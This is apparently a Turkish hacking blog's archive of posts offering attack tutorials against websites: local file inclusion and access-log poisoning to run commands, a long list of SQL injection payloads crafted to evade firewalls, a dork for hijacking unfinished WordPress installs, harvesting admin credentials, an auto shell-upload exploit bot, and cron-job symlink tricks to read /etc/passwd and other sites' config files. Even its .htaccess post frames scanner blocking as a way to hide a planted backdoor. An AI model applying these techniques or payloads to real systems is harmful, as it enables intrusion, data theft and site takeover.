Newest Post
Archive for Haziran 2019
Merhaba arkadaşlar bugün sizlere
siteleri access_log inject ederek lfı siteleri rfı çevirmeyi anlatacağım rfı çevirmekten kastım komut çalıştırmak
sitemizi bulduk arkadaşlar şimdi sitede lfı varmı kontrol ediyoruz
../../../../../../../../../../../../../../../etc/passwd denedik ama olmadı arkadaşlar
şimdi sonuna ekleyerek bypasslıyoruz yani şu şekilde
../../../../../../../../../../../../../../../etc/passwd
şimdi access_logun dizinini bulmak için /etc/httpd/conf/httpd.conf yapıyoruz
ve ctrl+u yapıyoruz ve kendi sitemizi kaynak kodlarında arıyoruz
gördüğünüz gibi 1523 satırda access_log dizini bulduk dizini /home/pro_99/null.com/access_log
1513 satıra bakacak olursak 12.34.5.678:80 (12.34.5.678 temsilidir) server ip ve 80 portunu görüyoruz bu port işimize yarayacak bir kaç adım sonra
şimdi size bi perl script vereceğim onla siteye inject edeceğiz
perl scriptadı.pl hedef.com 80
burdaki 80 daha önce serverde vardı :80 şeklinde buraya serverde açık herangi portu girebilirsiniz
script indir --> http://link.tl/2hVQE
şimdi siteye gidin ve ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log
girin ekranda v0pcr3w arayın eğer ordaysa başarılı olmuş demektir
sitede ../../../../../../../../../../../../../../../home/pro_99/null.com/access_log&cmd= şeklinde artık komut çalıştırabilirsiniz ben id komutuna bakacağım çalışıp çalışmadığını görün diye yukarda gördüğünüz gibi çalışıyor
istediğiniz bir konu veya sorunuz varsa yorum yapın
comment if you have a topic or question you want
merhabalar bugün sizlere websitenizi .htaccess editleyere bazı saldırılardan korunmayı ve sitenizi güvenliği için bir kaç yoldan bahsedeceğim
.htaccess (hypertext access file)
Genelde Sunucunun Ana dizininde olan
Adı olmayan Ayarlar Uygulamalar Yapışan Dosyadır. Güvenlik ,Yetki, Düzenleme, Ayar, kısıtlama vb.
işlemleri yapabiliyoruz.
bu gün Biz Sadece Güvenliğin Bir kısmını Ele Alacağız .
Scannerlardan korunma
örnek bi sitenin içindesiniz çok önemli bir site
siteye backdoor bıraktınız bide shell bunu bulmamaları içinde bunu kullanabilirsiniz
bu alacağımız önlem sayesinde Acunetix,sqlmap,nikto gibi
Scannerlardan korunmamızı sağlıyor bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .
bunu web scannerlere göre editleyebilirsiniz
RewriteEngine On[/B][/B][/COLOR][/SIZE][/CENTER]
[SIZE=4][COLOR=#000000][B]
[CENTER][B]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} Acunetix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>
sql injection Engelleme
günümüzün en popiler açıklarından biri sql injection her sistemde olabilir nerdeyse bütün ülkelerin sitelerinde mevcut bir açık eğer sizin sitenizde sql açığı varsa ve bunun nasıl giderileceğini bilmiyorsanız en azından .htaccess dosyası ile bunu bi nebze önleyebilirsiniz ama şunu söylemekte fayda var buda kesin bir çözüm değil
bunu yapmak için .htaccess dosyamızın ana dizinde olması lazım .
RewriteEngine On[/SIZE][/COLOR][/B][/B][/B][/CENTER]
[B][B][B][COLOR=rgb(0, 0, 0)][SIZE=4]
[CENTER]RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{REQUEST_URI} ^/(,|;|<|>|/{2,999}).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(java|curl|wget).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(winhttp|HTTrack|clshttp|archiver|loader|email|harvest|extract|grab|miner).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(libwww|curl|wget|python|scan).* [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{HTTP_COOKIE} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(localhost|loopback|127\\.0\\.0\\.1).* [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(<|>|’|%0A|%0D|’|<|>|).* [NC,OR]
RewriteCond %{QUERY_STRING} [^a-z](|order|union|declare|char|set|cast|convert|delete|drop|exec|insert|meta|script|select|truncate|update)[^a-z] [NC]
RewriteRule (.*) - [F]
XSS engelleme
xss açığını biliyorsunuzdur bu açığı kesin olarak kapatmak için .htaccess editleyebilirz
şimdi bu ne işe yarayacak saldırgan siteye xss denerse hata ile karşılaşacak
örnek
index.php?id=<script>alert(’Red’)</script>
yaptığımız anda 403 hatası verecektir.
RewriteEngine On[/B][/CENTER][/B][/CENTER]
[B]
[CENTER][B][CENTER]RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php|forum.php|yaz.php [F,L]
websitesi erişim kapatma
örneğin bi websitesiniz var ve siz bu websitesinin a hack forumunda paylaşıldığını
gördünüz sitenizi o siteden gelenlere kapatmak için
<Files ~ "^.(htaccess|htpasswd)$">[/SIZE][/COLOR][/B][/CENTER]
[B][COLOR=rgb(0, 0, 0)][SIZE=5]
[CENTER]deny from all
</Files>
order deny,allow
deny from ahackforumu.com
allow from 192.168.1.1
allow from http://google.com
allow from yazarak izin verip
denny from yazarak engellye biliriz .
ülkelere erişim kapatma
örnek burda IPCountry TR yaparak siteyi TR'den gelenlere kapadık
SetEnvIf CF-IPCountry TR BuzzOff=1[/B][/CENTER]
[B]
[CENTER]Order allow,deny
Allow from all
Deny from env=BuzzOff
Tag :// Htaccess,
Tag :// Htaccess Ile Web Site Güvenliği,
Tag :// Site Güvenliği,
Tag :// Web Site Güvenliği
ORDER BY
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
UNION SELECT
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
REVERSE(noinu)+REVERSE(tceles)
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
union+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
+%2F**/+Union/*!select*/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
uNiOn aLl sElEcT
UNIunionON+SELselectECT
/**/union/*!50000select*//**/
0%a0union%a0select%09
%0Aunion%0Aselect%0A
%55nion/**/%53elect
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
%0A%09UNION%0CSELECT%10NULL%
/*!union*//*--*//*!all*//*--*//*!select*/
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
+UnIoN/*&a=*/SeLeCT/*&a=*/
union+sel%0bect
+uni*on+sel*ect+
+#1q%0Aunion all#qa%0A#%0Aselect
union(select (1),(2),(3),(4),(5))
UNION(SELECT(column)FROM(table))
%23xyz%0AUnIOn%23xyz%0ASeLecT+
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+
union(select(1),2,3)
union (select 1111,2222,3333)
uNioN (/*!/**/ SeleCT */ 11)
union (select 1111,2222,3333)
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
/union\sselect/g
/union\s+select/i
/*!UnIoN*/SeLeCT
+UnIoN/*&a=*/SeLeCT/*&a=*/
+uni>on+sel>ect+
+(UnIoN)+(SelECT)+
+(UnI)(oN)+(SeL)(EcT)
+’UnI”On’+'SeL”ECT’
+uni on+sel ect+
+/*!UnIoN*/+/*!SeLeCt*/+
/*!u%6eion*/ /*!se%6cect*/
uni%20union%20/*!select*/%20
union%23aa%0Aselect
/**/union/*!50000select*/
/^.*union.*$/ /^.*select.*$/
/*union*/union/*select*/select+
/*uni X on*/union/*sel X ect*/
+un/**/ion+sel/**/ect+
+UnIOn%0d%0aSeleCt%0d%0a
UNION/*&test=1*/SELECT/*&pwn=2*/
un?<ion sel="">+un/**/ion+se/**/lect+
+UNunionION+SEselectLECT+
+uni%0bon+se%0blect+
%252f%252a*/union%252f%252a /select%252f%252a*/
/%2A%2A/union/%2A%2A/select/%2A%2A/
%2f**%2funion%2f**%2fselect%2f**%2f
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
/*!UnIoN*/SeLecT+
information_schema.tables
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
Concat
CoNcAt()
concat()
CON%08CAT()
CoNcAt()
%0AcOnCat()
/**//*!12345cOnCat*/
/*!50000cOnCat*/(/*!*/)
unhex(hex(concat(table_name)))
unhex(hex(/*!12345concat*/(table_name)))
unhex(hex(/*!50000concat*/(table_name)))
Group Concat
/*!group_concat*/()
gRoUp_cOnCAt()
group_concat(/*!*/)
group_concat(/*!12345table_name*/)
group_concat(/*!50000table_name*/)
/*!group_concat*/(/*!12345table_name*/)
/*!group_concat*/(/*!50000table_name*/)
/*!12345group_concat*/(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
/*!GrOuP_ConCaT*/()
/*!12345GroUP_ConCat*/()
/*!50000gRouP_cOnCaT*/()
/*!50000Gr%6fuP_c%6fnCAT*/()
unhex(hex(group_concat(table_name)))
unhex(hex(/*!group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
unhex(hex(/*!50000group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
convert(group_concat(table_name)+using+ascii)
convert(group_concat(/*!table_name*/)+using+ascii)
convert(group_concat(/*!12345table_name*/)+using+ascii)
convert(group_concat(/*!50000table_name*/)+using+ascii)
CONVERT(group_concat(table_name)+USING+latin1)
CONVERT(group_concat(table_name)+USING+latin2)
CONVERT(group_concat(table_name)+USING+latin3)
CONVERT(group_concat(table_name)+USING+latin4)
CONVERT(group_concat(table_name)+USING+latin5)
istediğiniz bir konu veya sorunuz varsa yorum yapın
comment if you have a topic or question you want
Tag :// exploit,
Tag :// exploit scaner,
Tag :// joomla,
Tag :// joomla exploit,
Tag :// joomla exploit scaner,
Tag :// joomla scaner,
Tag :// tool
google dork
inurl : /blog/wp-admin/install.php
/wordpress/wp-admin/install.php
kendi dilinizi seçin ve kuruluma başlayın
çalışan db bilgilerini girin
kurulum tamamdır şimdi siteye wp-login.php ile gidin bilgileri girin
ve site elinizde
Tag :// hack,
Tag :// hacking,
Tag :// wordpress,
Tag :// wordpress hack,
Tag :// wordpress hacking,
Tag :// wp-admin-install,
Tag :// wp-admin-install hack,
Tag :// wp-admin-install hacking
Merhaba arkadaşlar bugün sizlere
admin panel kayak kodlarından sitenin giriş bilgilerini almayı göstereceğim
gördüğünüz gibi admin panelimiz şimdi ctrl+u ile kaynak kodlarına gidelim
şimdi kaynak kodlarında url üzerinden denemeler yapıyoruz admin.php - home.php -dashboard.php gibi amacımız eğer şifreyi girseydik bizi hangi sayfaya atacağını bulmak
gördüğünüz gibi doğru olanı bulduk şimdi biraz kurcalıyoruz
evet user diye aradık ve manage_user.php bulduk bu bizim işimize yarabilir o zaman oraya gidelim
evet bu sayfayıda kurcaladık ve bulduk add_user.php?id=1 bu site içinde user ekleme editleme bölümü şimdi bide oraya gidelim
ve biraz kurcalayınca değerleri bulduk gördüğünüz gibi bu kadar kolay
bu aşama işi arkadaşlar her sitede çalışmaz ama denemek lazım hedef sitede işinize yarar
Tag :// admin finder,
Tag :// admin page,
Tag :// admin page finder,
Tag :// admin panel,
Tag :// admin panel finder,
Tag :// page finder,
Tag :// panel finder,
Tag :// perl,
Tag :// perl script,
Tag :// script,
Tag :// tool
ÖZELLİKLER
[+] Auto Cms Detect
[1] WordPress :
[+] WP All Import
[+] Adblock Blocker
[+] Blaze
[+] Download Manager
[+] Catpro
[+] Cherry Plugin
[+] Power Zoomer
[+] Formcraft
[+] levoslideshow
[+] Revslider Upload Shell
[+] Gravity Forms
[+] Revslider Dafece Ajax
[+] Simple Ads Manager
[+] Revslider Get Config
[+] Showbiz
[+] Slide Show Pro
[+] dzs-zoomsounds
[+] WP Mobile Detector
[+] Wysija
[+] InBoundio Marketing
[+] Reflex Gallery
[+] PHP Event Calendar
[+] Creative Contact Form
[+] Work The Flow File Upload
[+] WP Job Manger
[+] Synoptic
[+] Wp Shop
[+] Com Jdownloads Index
[+] Content Injection
[2] Joomla
[+] Com Jce
[+] Com Media
[+] Com Jdownloads
[+] Com Fabrik
[+] Com Foxcontact
[4] PrestaShop
[+] Com Ads Manager
[+] Com Blog
[+] Com Users
[+] Com Weblinks
[+] mod_simplefileupload
[3] DruPal
[+] Add Admin
[+] homepageadvertise
[+] columnadverts
[+] soopamobile
[+] soopabanners
[+] Vtermslideshow
[+] simpleslideshow
[+] productpageadverts
[+] homepageadvertise2
[+] advancedslider
[+] jro_homepageadvertise
[+] attributewizardpro
[+] 1attributewizardpro
[+] AttributewizardproOLD
[+] attributewizardpro_x
[+] cartabandonmentpro
[+] nvn_export_orders
[+] cartabandonmentproOld
[+] videostab
[+] wg24themeadministration
[+] fieldvmegamenu
[+] wdoptionpanel
[+] pk_flexmenu
[+] pk_vertflexmenu
[+] megamenu
[+] SQL injection
[+] tdpsthemeoptionpanel
[+] psmodthemeoptionpanel
[+] masseditproduct
[5] Lokomedia
+Download ICG Bot : ( tool by 04x )
+Download python 2.7.14 :
Tag :// auto upload,
Tag :// Auto upload shell,
Tag :// Auto upload shell Exploit,
Tag :// Auto upload shell Exploit dowload,
Tag :// Auto upload shell Exploit indir,
Tag :// exploit,
Tag :// free,
Tag :// shell Exploit,
Tag :// shell upload,
Tag :// upload shell Exploit
Merhaba arkadaşlar bugün sizlere
cron job bypass ile /etc/passwd okunmayan serverlerde /etc/passwd okumayı anlatacağım
öncelikle sitemizde bakıyoruz /etc/passwd hepsini okuyamıyoruz
şimdi cpanele gidelim tabi cpaneli cracklemeniz lazım
alt kısımda cron jobs buluyoruz arkadaşlar
şimdi yukarıda email kısmı var buraya sallama bir mail girin maille işimiz yok
Once Per Minute seçin şimdi aşağıda command kısmı var işimiz orayla
Kod:
ln -s /etc/passwd 1.txt
komutumuz bu arkadaşlar bu komut sayesinde filemanagerde 1.txt oluşacak ve bize /etc/passwd okuma şansı sunacak
Filemanagere gidiyoruz dosya hemen oluşmaz arkadaşlar sayfayı yeniliyoruz
30-40 sn sonra oluşuyor
dosyaya tıklayıp editi seçiyoruz
gördüğünüz gibi tüm /etc/passwd okuduk
aynı şekilde
Kod:
ln -s /etc/named.conf 2.txt
ile named.conf okuduk
gördüğünüz gibi arkadaşlar
burdan sonrası sizde
named.conf dan user olan siteyi bulup aynı şekilde config bilgilerini
çekebilirsiniz
örnek sitemiz MyBB forum
user --> kartal
ln -s /home/kartal/public_html/inc/config.php 3.txt
şeklinde sitenin config bilgilerini alabilirsiniz
Tag :// apache bypass,
Tag :// bypass,
Tag :// Cloudlinux Server,
Tag :// Cloudlinux Server bypass,
Tag :// Cron Job,
Tag :// Cron Job bypass,
Tag :// litespeed bypass,
Tag :// server bypass
Bu özet kullanılabilir değil. Yayını görüntülemek için lütfen
burayı tıklayın.